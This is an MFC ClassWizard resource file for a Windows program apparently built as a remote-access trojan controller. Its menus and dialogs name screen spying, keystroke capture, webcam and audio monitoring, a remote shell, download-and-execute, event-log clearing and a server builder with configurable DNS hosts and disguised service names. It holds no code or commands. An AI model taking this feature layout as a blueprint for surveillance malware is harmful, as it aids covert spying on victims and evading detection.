; CLW file contains information for the MFC ClassWizard

[General Info]
Version=1
LastClass=CPcView
LastTemplate=CDialog
NewFileInclude1=#include "stdafx.h"
NewFileInclude2=#include "Winds.h"
LastPage=0

ClassCount=23
Class1=CWindsApp
Class2=CWindsDoc
Class3=CWindsView
Class4=CMainFrame

ResourceCount=31
Resource1=IDR_LIST
Class5=CAboutDlg
Resource2=IDD_MORE_CHOOSE
Resource3=IDD_AUDIO
Resource4=IDR_SERVICES
Resource5=IDD_TRANSFERMODE_DLG
Resource6=IDD_SCREENSPY
Resource7=IDD_SYSTEM
Resource8=IDD_KEYBOARD
Resource9=IDD_WEBCAM
Resource10=IDD_ABOUTBOX
Resource11=IDR_MAINFRAME
Resource12=IDR_LOG
Resource13=IDR_TOOLBAR2
Resource14=IDD_LANPROXYDLG
Resource15=IDD_CHANGE_GROUP
Resource16=IDR_PSLIST
Resource17=IDD_SHELL
Resource18=IDD_REGEDIT
Resource19=IDD_FILE
Class6=CIPUPDATA
Class7=CPcView
Resource20=IDD_SERVICES
Class8=CLocalSet
Resource21=IDD_LOCALSET
Resource22=IDR_TOOLBAR
Class9=CUpData
Class10=CBuildView
Class11=CLogView
Resource23=IDR_FILEMANAGER
Class12=CScreenSpyDlg
Class13=CSystemDlg
Resource24=IDD_UPDATA
Resource25=IDR_REMOTE_VIEW
Resource26=IDR_MINIMIZE
Resource27=IDR_MAINFRAME1
Resource28=IDR_LOCAL_VIEW
Class14=CKeyBoardDlg
Class15=CAudioDlg
Class16=CShellDlg
Class17=CWebCamDlg
Class18=CFileTransferModeDlg
Class19=CFileManagerDlg
Class20=CRegDlg
Class21=CServiceDlg
Resource29=IDD_BUILDVIEW
Class22=CLanProxyDlg
Resource30=IDD_IPUPDATA
Class23=CChangeGroup
Resource31=IDR_TOOLBAR1

[CLS:CWindsApp]
Type=0
HeaderFile=Winds.h
ImplementationFile=Winds.cpp
Filter=N

[CLS:CWindsDoc]
Type=0
HeaderFile=WindsDoc.h
ImplementationFile=WindsDoc.cpp
Filter=N

[CLS:CWindsView]
Type=0
HeaderFile=WindsView.h
ImplementationFile=WindsView.cpp
Filter=C
BaseClass=CView
VirtualFilter=VWC
LastObject=CWindsView


[CLS:CMainFrame]
Type=0
HeaderFile=MainFrm.h
ImplementationFile=MainFrm.cpp
Filter=T
BaseClass=CFrameWnd
VirtualFilter=fWC
LastObject=CMainFrame




[CLS:CAboutDlg]
Type=0
HeaderFile=Winds.cpp
ImplementationFile=Winds.cpp
Filter=D
LastObject=CAboutDlg

[DLG:IDD_ABOUTBOX]
Type=1
Class=CAboutDlg
ControlCount=4
Control1=IDC_STATIC,static,1342177283
Control2=IDC_STATIC,static,1342308480
Control3=IDC_STATIC,static,1342308352
Control4=IDOK,button,1342373889

[MNU:IDR_MAINFRAME]
Type=1
Class=CMainFrame
Command1=ID_FILE_NEW
Command2=ID_FILE_OPEN
Command3=ID_FILE_SAVE
Command4=ID_FILE_SAVE_AS
Command5=ID_FILE_MRU_FILE1
Command6=ID_APP_EXIT
Command7=ID_EDIT_UNDO
Command8=ID_EDIT_CUT
Command9=ID_EDIT_COPY
Command10=ID_EDIT_PASTE
Command11=ID_VIEW_TOOLBAR
Command12=ID_VIEW_STATUS_BAR
Command13=ID_APP_ABOUT
CommandCount=13

[ACL:IDR_MAINFRAME]
Type=1
Class=CMainFrame
Command1=ID_FILE_NEW
Command2=ID_FILE_OPEN
Command3=ID_FILE_SAVE
Command4=ID_EDIT_UNDO
Command5=ID_EDIT_CUT
Command6=ID_EDIT_COPY
Command7=ID_EDIT_PASTE
Command8=ID_EDIT_UNDO
Command9=ID_EDIT_CUT
Command10=ID_EDIT_COPY
Command11=ID_EDIT_PASTE
Command12=ID_NEXT_PANE
Command13=ID_PREV_PANE
CommandCount=13

[MNU:IDR_LIST]
Type=1
Class=CPcView
Command1=IDM_FILEMANAGER
Command2=IDM_SCREENSPY
Command3=IDM_KEYBOARD
Command4=IDM_REMOTESHELL
Command5=IDM_SERVICES
Command6=IDM_REGEDIT
Command7=IDM_SYSTEM
Command8=IDM_WEBCAM
Command9=IDM_AUDIO_LISTEN
Command10=IDM_LANPROXY
Command11=IDM_FIND_PROCESS
Command12=IDM_FIND_WINDOW
Command13=IDM_LOGOFF
Command14=IDM_REBOOT
Command15=IDM_SHUTDOWN
Command16=IDM_REMOVE
Command17=IDM_DOWNEXEC
Command18=IDM_UPDATE_SERVER
Command19=IDM_CLEANEVENT
Command20=IDM_OPEN_URL_HIDE
Command21=IDM_OPEN_URL_SHOW
Command22=IDM_RENAME_REMARK
Command23=IDM_CHANGE_GROUP
Command24=IDM_DISCONNECT
Command25=IDM_SELECT_ALL
Command26=IDM_UNSELECT_ALL
Command27=IDM_CREATE_GROUP
Command28=IDM_DELETE_GROUP
Command29=IDM_SELGROUP
CommandCount=29

[DLG:IDD_WEBCAM]
Type=1
Class=CWebCamDlg
ControlCount=0

[DLG:IDD_TRANSFERMODE_DLG]
Type=1
Class=CFileTransferModeDlg
ControlCount=9
Control1=IDC_STATIC,button,1342177287
Control2=IDC_TIPS,static,1342308352
Control3=IDC_OVERWRITE,button,1342242816
Control4=IDC_ADDITION,button,1342242816
Control5=IDC_JUMP,button,1342242816
Control6=IDC_OVERWRITE_ALL,button,1342242816
Control7=IDC_ADDITION_ALL,button,1342242816
Control8=IDC_JUMP_ALL,button,1342242816
Control9=IDC_CANCEL,button,1342242816

[DLG:IDD_SYSTEM]
Type=1
Class=CSystemDlg
ControlCount=4
Control1=IDC_LIST_PROCESS,SysListView32,1350631425
Control2=IDC_TAB,SysTabControl32,1342177600
Control3=IDC_LIST_WINDOWS,SysListView32,1350631425
Control4=IDC_LIST_DIALUPASS,SysListView32,1350631425

[DLG:IDD_SHELL]
Type=1
Class=?
ControlCount=1
Control1=IDC_EDIT,edit,1353781444

[DLG:IDD_SERVICES]
Type=1
Class=CServiceDlg
ControlCount=1
Control1=IDC_SERVICE_LIST,SysListView32,1350631429

[DLG:IDD_SCREENSPY]
Type=1
Class=CScreenSpyDlg
ControlCount=0

[DLG:IDD_MORE_CHOOSE]
Type=1
Class=?
ControlCount=20
Control1=IDC_STATIC,button,1342177287
Control2=IDC_CHECK_XP,button,1342242819
Control3=IDC_CHECK_NT,button,1342242819
Control4=IDC_CHECK_VISTA,button,1342242819
Control5=IDC_CHECK_2000,button,1342242819
Control6=IDC_CHECK_2003,button,1342242819
Control7=IDC_CHECK_WIN7,button,1342242819
Control8=IDC_CHECK_2008,button,1342242819
Control9=IDC_STATIC,button,1342177287
Control10=IDC_STATIC,static,1342308352
Control11=IDC_COMBO_CAM,combobox,1344340227
Control12=IDC_STATIC,static,1342308352
Control13=IDC_COMBO_WINDOW,combobox,1478557954
Control14=IDC_STATIC,static,1342308352
Control15=IDC_COMBO_PROSS,combobox,1344340226
Control16=IDC_STATIC,static,1342308352
Control17=IDC_COMBO_ADDRESS,combobox,1344340226
Control18=IDC_FIND,button,1342275584
Control19=IDC_STATIC,static,1342308352
Control20=IDC_NEW_GROUP_NAME,combobox,1344340226

[DLG:IDD_KEYBOARD]
Type=1
Class=CKeyBoardDlg
ControlCount=1
Control1=IDC_EDIT,edit,1352734788

[DLG:IDD_AUDIO]
Type=1
Class=CAudioDlg
ControlCount=5
Control1=IDC_STATIC,button,1342177287
Control2=IDC_SEND_LOCALAUDIO,button,1342177283
Control3=IDC_STATIC,static,1342308352
Control4=IDC_STATIC,static,1342308352
Control5=IDC_TIPS,static,1342308352

[CLS:CPcView]
Type=0
HeaderFile=PcView.h
ImplementationFile=PcView.cpp
BaseClass=CView
Filter=C
VirtualFilter=VWC
LastObject=CPcView

[DLG:IDD_LOCALSET]
Type=1
Class=CLocalSet
ControlCount=15
Control1=IDC_STATIC,button,1342177287
Control2=IDC_STATIC,static,1342308352
Control3=IDC_STATIC,static,1342308352
Control4=IDC_STATIC,static,1342308352
Control5=IDC_STATIC,static,1342308352
Control6=IDC_LISTEN_PORT,edit,1350639745
Control7=IDC_PROXY_PORT,edit,1350639745
Control8=IDC_PASSWORD,edit,1350631553
Control9=IDC_MAX_CONNECTION,edit,1350639745
Control10=IDC_AUTO,button,1342275587
Control11=IDC_APPLY,button,1342275584
Control12=IDC_EXPLAIN,button,1342275584
Control13=IDC_CLOSE_POP,button,1342275587
Control14=IDC_SAVE_GROUP,button,1342275587
Control15=IDC_CLOSE_SOUND,button,1342275587

[CLS:CLocalSet]
Type=0
HeaderFile=LocalSet.h
ImplementationFile=LocalSet.cpp
BaseClass=CFormView
Filter=D
LastObject=IDC_EXPLAIN
VirtualFilter=VWC

[DLG:IDD_UPDATA]
Type=1
Class=CUpData
ControlCount=6
Control1=IDC_LIST_UPDATA,SysListView32,1350631425
Control2=IDC_INSERT_ITEM,button,1342275584
Control3=IDC_MODIFY_ITEM,button,1342275584
Control4=IDC_DELETE_ITEM,button,1342275584
Control5=IDC_UPDATEIP,button,1342275584
Control6=IDC_TEST_ITEM,button,1342275584

[CLS:CUpData]
Type=0
HeaderFile=UpData.h
ImplementationFile=UpData.cpp
BaseClass=CFormView
Filter=D
LastObject=CUpData
VirtualFilter=VWC

[DLG:IDD_BUILDVIEW]
Type=1
Class=CBuildView
ControlCount=47
Control1=IDC_STATIC,button,1342177287
Control2=IDC_STATIC,button,1342177287
Control3=IDC_STATIC,button,1342177287
Control4=IDC_INSERT_SIZE,button,1342275587
Control5=IDC_PACK,button,1342275587
Control6=IDC_STATIC,static,1342308352
Control7=IDC_STATIC,static,1342308352
Control8=IDC_STATIC,static,1342308352
Control9=IDC_STATIC,static,1342308352
Control10=IDC_DNS1,edit,1350631552
Control11=IDC_STATIC,static,1342308352
Control12=IDC_PORT1,edit,1350631552
Control13=IDC_DNS2,edit,1350631552
Control14=IDC_DNS4,edit,1350631552
Control15=IDC_STATIC,static,1342308352
Control16=IDC_STATIC,static,1342308352
Control17=IDC_STATIC,static,1342308352
Control18=IDC_PORT2,edit,1350631552
Control19=IDC_PORT4,edit,1350631552
Control20=IDC_DNS3,edit,1350631552
Control21=IDC_PORT3,edit,1350631552
Control22=IDC_STATIC,button,1342177287
Control23=IDC_STATIC,static,1342308352
Control24=IDC_STATIC,static,1342308352
Control25=IDC_STATIC,static,1342308352
Control26=IDC_STATIC,static,1342308352
Control27=IDC_REMARK,edit,1350631552
Control28=IDC_STATIC,static,1342308352
Control29=IDC_BTN_REMARK,button,1342275584
Control30=IDC_PASSWORD,edit,1350631584
Control31=IDC_BTN_PASSWORD,button,1342275584
Control32=IDC_BTN_SERVICE_NAME,button,1342275584
Control33=IDC_BTN_SERVICE_DESCRIBTION,button,1342275584
Control34=IDC_BTN_GROUP,button,1342275584
Control35=IDC_BTN_SERVICE_DISPLAY_NAME,button,1342275584
Control36=IDC_STATIC,static,1342308352
Control37=IDC_STATIC,static,1342308352
Control38=IDC_GROUP,edit,1350631552
Control39=IDC_SERVICE_DISPLAY_NAME,edit,1350631552
Control40=IDC_SERVICE_NAME,edit,1350631552
Control41=IDC_INSTALL_SHARE,button,1342242819
Control42=IDC_SERVICE_DESCRIBETION,edit,1350631552
Control43=IDC_CHANG_PATH,combobox,1344339970
Control44=IDC_BTN_PATH,button,1342275584
Control45=IDC_NODELETE,button,1342275587
Control46=IDC_BUILD_SERVER,button,1342275584
Control47=IDC_MODIFY_CONFIG,button,1342275584

[CLS:CBuildView]
Type=0
HeaderFile=BuildView.h
ImplementationFile=BuildView.cpp
BaseClass=CFormView
Filter=D
LastObject=CBuildView
VirtualFilter=VWC

[CLS:CLogView]
Type=0
HeaderFile=LogView.h
ImplementationFile=LogView.cpp
BaseClass=CEditView
Filter=C
VirtualFilter=VWC
LastObject=CLogView

[TB:IDR_TOOLBAR]
Type=1
Class=?
Command1=IDM_FILEMANAGER
Command2=IDM_SCREENSPY
Command3=IDM_KEYBOARD
Command4=IDM_REMOTESHELL
Command5=IDM_SYSTEM
Command6=IDM_REGEDIT
Command7=IDM_SERVICES
Command8=IDM_WEBCAM
Command9=IDM_AUDIO_LISTEN
Command10=IDM_LANPROXY
Command11=IDM_BUILDVIEW
CommandCount=11

[CLS:CScreenSpyDlg]
Type=0
HeaderFile=ScreenSpyDlg.h
ImplementationFile=ScreenSpyDlg.cpp
BaseClass=CDialog
Filter=D
LastObject=CScreenSpyDlg

[MNU:IDR_REMOTE_VIEW]
Type=1
Class=?
Command1=IDM_REMOTE_BIGICON
Command2=IDM_REMOTE_SMALLICON
Command3=IDM_REMOTE_LIST
Command4=IDM_REMOTE_REPORT
CommandCount=4

[MNU:IDR_PSLIST]
Type=1
Class=?
Command1=IDM_KILLPROCESS
Command2=IDM_REFRESHPSLIST
CommandCount=2

[MNU:IDR_MINIMIZE]
Type=1
Class=?
Command1=IDM_SHOW
Command2=IDM_EXIT
CommandCount=2

[MNU:IDR_MAINFRAME1]
Type=1
Class=?
Command1=ID_APP_EXIT
Command2=IDM_SETTINGS
Command3=IDM_BUILD
Command4=ID_VIEW_STATUS_BAR
Command5=ID_APP_ABOUT
CommandCount=5

[MNU:IDR_LOG]
Type=1
Class=?
Command1=IDM_EVENT_DELETE
Command2=IDM_ALL_DELETE
Command3=IDM_EVENT_SAVE
Command4=IDM_EVENT_COPY
CommandCount=4

[MNU:IDR_LOCAL_VIEW]
Type=1
Class=?
Command1=IDM_LOCAL_BIGICON
Command2=IDM_LOCAL_SMALLICON
Command3=IDM_LOCAL_LIST
Command4=IDM_LOCAL_REPORT
CommandCount=4

[MNU:IDR_FILEMANAGER]
Type=1
Class=?
Command1=IDM_TRANSFER
Command2=IDM_RENAME
Command3=IDM_DELETE
Command4=IDM_NEWFOLDER
Command5=IDM_LOCAL_OPEN
Command6=IDM_REMOTE_OPEN_SHOW
Command7=IDM_REMOTE_OPEN_HIDE
Command8=IDM_REFRESH
CommandCount=8

[CLS:CKeyBoardDlg]
Type=0
HeaderFile=KeyBoardDlg.h
ImplementationFile=KeyBoardDlg.cpp
BaseClass=CDialog
Filter=D
LastObject=CKeyBoardDlg

[CLS:CAudioDlg]
Type=0
HeaderFile=AudioDlg.h
ImplementationFile=AudioDlg.cpp
BaseClass=CDialog
Filter=D
LastObject=CAudioDlg

[CLS:CShellDlg]
Type=0
HeaderFile=ShellDlg.h
ImplementationFile=ShellDlg.cpp
BaseClass=CDialog
Filter=D
LastObject=CShellDlg

[CLS:CWebCamDlg]
Type=0
HeaderFile=WebCamDlg.h
ImplementationFile=WebCamDlg.cpp
BaseClass=CDialog
Filter=D
LastObject=CWebCamDlg

[CLS:CSystemDlg]
Type=0
HeaderFile=SystemDlg.h
ImplementationFile=SystemDlg.cpp
BaseClass=CDialog
Filter=D
LastObject=CSystemDlg

[CLS:CFileTransferModeDlg]
Type=0
HeaderFile=FileTransferModeDlg.h
ImplementationFile=FileTransferModeDlg.cpp
BaseClass=CDialog
Filter=D
LastObject=CFileTransferModeDlg

[CLS:CFileManagerDlg]
Type=0
HeaderFile=FileManagerDlg.h
ImplementationFile=FileManagerDlg.cpp
BaseClass=CDialog
Filter=D
LastObject=CFileManagerDlg

[TB:IDR_TOOLBAR2]
Type=1
Class=?
Command1=IDT_REMOTE_PREV
Command2=IDT_REMOTE_COPY
Command3=IDT_REMOTE_DELETE
Command4=IDT_REMOTE_NEWFOLDER
Command5=IDT_REMOTE_VIEW
Command6=IDT_REMOTE_STOP
CommandCount=6

[TB:IDR_TOOLBAR1]
Type=1
Class=?
Command1=IDT_LOCAL_PREV
Command2=IDT_LOCAL_COPY
Command3=IDT_LOCAL_DELETE
Command4=IDT_LOCAL_NEWFOLDER
Command5=IDT_LOCAL_VIEW
Command6=IDT_LOCAL_STOP
CommandCount=6

[DLG:IDD_REGEDIT]
Type=1
Class=CRegDlg
ControlCount=2
Control1=IDC_TREE,SysTreeView32,1350631424
Control2=IDC_LIST,SysListView32,1350631425

[CLS:CRegDlg]
Type=0
HeaderFile=RegDlg.h
ImplementationFile=RegDlg.cpp
BaseClass=CDialog
Filter=D
LastObject=IDC_TREE
VirtualFilter=dWC

[CLS:CServiceDlg]
Type=0
HeaderFile=ServiceDlg.h
ImplementationFile=ServiceDlg.cpp
BaseClass=CDialog
Filter=D
LastObject=CServiceDlg

[MNU:IDR_SERVICES]
Type=1
Class=?
Command1=IDM_REFSESH_SER
Command2=IDM_START_SER
Command3=IDM_STOP_SER
Command4=IDM_DEL_SER
Command5=IDM_AUTO_SER
Command6=IDM_HAND_SER
Command7=IDM_DIS_SER
CommandCount=7

[DLG:IDD_IPUPDATA]
Type=1
Class=CIPUPDATA
ControlCount=25
Control1=IDOK,button,1342242816
Control2=IDCANCEL,button,1342242816
Control3=IDC_STATIC,static,1342308352
Control4=IDC_UP_NAME,edit,1350631552
Control5=IDC_STATIC,static,1342308352
Control6=IDC_STATIC,static,1342308352
Control7=IDC_STATIC,static,1342308352
Control8=IDC_STATIC,static,1342308352
Control9=IDC_STATIC,static,1342308352
Control10=IDC_STATIC,static,1342308352
Control11=IDC_STATIC,static,1342308352
Control12=IDC_UP_CHOOSE,combobox,1344339971
Control13=IDC_UP_DNS,edit,1350631552
Control14=IDC_UP_IP,edit,1350631552
Control15=IDC_UP_USER,edit,1350631552
Control16=IDC_UP_PASS,edit,1350631584
Control17=IDC_UP_PORT,edit,1350631552
Control18=IDC_MEMBER,edit,1350631552
Control19=IDC_STATIC,static,1342308352
Control20=IDC_STATIC,static,1342308352
Control21=IDC_STATIC,static,1342308352
Control22=IDC_STATIC,static,1342308352
Control23=IDC_STATIC,static,1342308352
Control24=IDC_STATIC,static,1342308352
Control25=IDC_STATIC,static,1342308352

[CLS:CIPUPDATA]
Type=0
HeaderFile=IPUPDATA.h
ImplementationFile=IPUPDATA.cpp
BaseClass=CDialog
Filter=D
VirtualFilter=dWC
LastObject=IDC_UP_CHOOSE

[DLG:IDD_FILE]
Type=1
Class=?
ControlCount=10
Control1=IDC_LOCAL_PATH,combobox,1344340290
Control2=IDC_LIST_LOCAL,SysListView32,1350632256
Control3=IDC_REMOTE_PATH,combobox,1344340290
Control4=IDC_LIST_REMOTE,SysListView32,1350632264
Control5=IDC_STATIC,static,1342308352
Control6=IDC_STATIC_REMOTE,static,1342308352
Control7=IDC_COMBO_FIND,combobox,1344340226
Control8=IDC_BEGIN_FIND,button,1342275584
Control9=IDC_END_FIND,button,1342275584
Control10=IDC_FIND_RETURN,button,1342275584

[DLG:IDD_LANPROXYDLG]
Type=1
Class=CLanProxyDlg
ControlCount=1
Control1=IDC_EDIT,edit,1353781444

[CLS:CLanProxyDlg]
Type=0
HeaderFile=LanProxyDlg.h
ImplementationFile=LanProxyDlg.cpp
BaseClass=CDialog
Filter=D
VirtualFilter=dWC

[DLG:IDD_CHANGE_GROUP]
Type=1
Class=CChangeGroup
ControlCount=3
Control1=IDOK,button,1342275584
Control2=IDCANCEL,button,1342275584
Control3=IDC_COMBO_GROUP,combobox,1344340226

[CLS:CChangeGroup]
Type=0
HeaderFile=ChangeGroup.h
ImplementationFile=ChangeGroup.cpp
BaseClass=CDialog
Filter=D
VirtualFilter=dWC
LastObject=CChangeGroup

